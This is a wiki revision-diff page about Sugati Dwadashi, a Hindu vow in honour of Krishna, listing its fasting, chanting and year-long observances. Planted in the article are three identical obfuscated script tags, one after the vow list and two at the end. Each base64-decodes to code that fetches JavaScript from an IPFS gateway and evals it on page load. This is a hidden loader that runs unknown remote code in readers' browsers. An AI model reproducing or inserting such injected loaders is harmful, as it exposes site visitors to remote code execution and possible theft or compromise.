Difference between revisions of "सुगति द्वादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*यह व्रत [[फाल्गुन]] [[शुक्ल पक्ष]] की [[द्वादशी]] से प्रारम्भ करना चाहिए।  
 
*यह व्रत [[फाल्गुन]] [[शुक्ल पक्ष]] की [[द्वादशी]] से प्रारम्भ करना चाहिए।  
 
*तिथिव्रत यह [[कृष्ण]] देवता का व्रत है।  
 
*तिथिव्रत यह [[कृष्ण]] देवता का व्रत है।  
Line 10: Line 10:
 
*[[आषाढ़]] से [[आश्विन]] तक की दूसरी अवधि में [[केशव]] नामजप (जिससे की मृत्यु के समय केशव नाम स्मरण हो सके) करना चाहिए।  
 
*[[आषाढ़]] से [[आश्विन]] तक की दूसरी अवधि में [[केशव]] नामजप (जिससे की मृत्यु के समय केशव नाम स्मरण हो सके) करना चाहिए।  
 
*तीसरी अवधि में विष्णुनाम का जप करना चाहिए।
 
*तीसरी अवधि में विष्णुनाम का जप करना चाहिए।
*देवी सुख एवं [[विष्णुलोक]] की प्राप्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 1, 1081-1083, विष्णुधर्मोत्तरपुराण 3|215|4-22 से उद्धरण)</ref>
+
*देवी सुख एवं [[विष्णुलोक]] की प्राप्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 1, 1081-1083, विष्णुधर्मोत्तरपुराण 3|215|4-22 से उद्धरण</ref>
  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 13:01, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat phalgun shukl paksh ki dvadashi se prarambh karana chahie.
  • tithivrat yah krishna devata ka vrat hai.
  • us din upavas karana chahie.
  • krishna ji ki pooja karani chahie.
  • 108 bar krishna ke nam ka jap karana chahie.
  • ek varsh tak karana chahie.
  • char-char masoan ke kram se tin avadhiyoan mean vibhajit karana chahie.
  • phalgun se arambh hone vale char masoan mean krishna namajap evan krishna pratima par jal ki tin dharaean arpit karani chahie.
  • ashadh se ashvin tak ki doosari avadhi mean keshav namajap (jisase ki mrityu ke samay keshav nam smaran ho sake) karana chahie.
  • tisari avadhi mean vishnunam ka jap karana chahie.
  • devi sukh evan vishnulok ki prapti hoti hai.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 1081-1083, vishnudharmottarapuran 3|215|4-22 se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>